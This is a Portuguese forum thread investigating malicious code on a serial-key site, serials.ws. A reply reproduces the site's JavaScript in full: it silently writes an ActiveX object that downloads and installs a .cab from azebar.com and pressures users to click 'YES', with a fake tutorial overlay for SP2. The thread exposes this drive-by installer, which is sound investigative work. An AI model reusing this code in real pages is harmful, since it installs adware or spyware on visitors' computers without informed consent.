Investigação em um site de serial

[insanity]

Dando uma olhado codigo-fonte da pagina serials.ws, encontrei algumas coisas interessantes.

O mais intereçante apesar de spams, adware, spyware, vírus, browser exploit and popups o numero de visitas no site e´ enorme.

Com ja´diz na pagina principal o site e´atualizado diariamente, assim que o anti-malware começa a detectar os problemas apresentados no site,

o administrador atento ja´atualiza seu site tambem =;).

Veja a imagem abaixo do cóndigo-fonte da pagina serials.ws:

[abobre]

insanity

 Mto bom o post, eu fiquei curioso com o que vc posto e entao fui avaliar o coder que tem no arquivo php, olhem o que eu encontrei:

Code Select Expand

<!--
 var flag=0;
 var loadfirst=1;
 
 var sp2=false;
 if(window.navigator.userAgent.indexOf("SV1") != -1) sp2=true;
 if (sp2){
   document.write('<div id="tutorial_popup" style="visibility:hidden;position:absolute;top:0px;left:0px;width:635px;height:308px;"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="635" height="308">');
   document.write('<param name="movie" value="http://www.azebar.com/install/sp2.swf"><param name="quality" value="high"><param name="wmode" value="transparent">');
   document.write('<embed src="http://www.azebar.com/install/sp2.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="700" height="500"></embed></object></div>');
 }
 document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
 function retryit(){
        if(window.retry && retry>0 && !sp2) {
                alert("You must click YES to get access");
                loadfirst=0;
                start_download();
                retry--;
                }
        }

 function start_download() {
        var bname=navigator.appName;
        var bver=parseInt(navigator.appVersion);
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                if(!loadfirst){
                        downloads_manager.document.close();
                        var holder= downloads_manager.document;
                } else {
                        var holder=document;
                }
                holder.write('<OBJECT id="barobject" width=1 height=1 classid="CLSID:D7BF3304-138B-4DD5-86EE-491BB6A2286C"');
                holder.write('codebase="http://www.azebar.com/install/1.cab" onerror="parent.retryit();">');
                holder.write('<PARAM name="AdvertID" value="">');
                holder.write('</OBJECT>');
                if(sp2 && !flag) document.all.tutorial_popup.style.visibility = "visible";
                flag++;
         }

}

 function start_download_loadfirst() {
        start_download();
        }

 // -->


<!--
        var currentDate = new Date();
        var adRecurrence = "always";
        var adId = "100000";
        var adExpiration = 0;
        var retry=3;
        var obj=null;

   
        function SetCookie(sName, sValue, sExpire){
                var expireCode = "";
                if (sExpire) { expireCode =  "expires=" + sExpire + ";" }
                document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
        }


        function GetCookie(sName) {
                var aCookie = document.cookie.split("; ");
                for (var i=0; i < aCookie.length; i++) {
                        var aCrumb = aCookie[i].split("=");
                        if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
                }
                return null;
        }

                SetCookie(adId,"1", adExpiration);
start_download();
//-->

 ateh +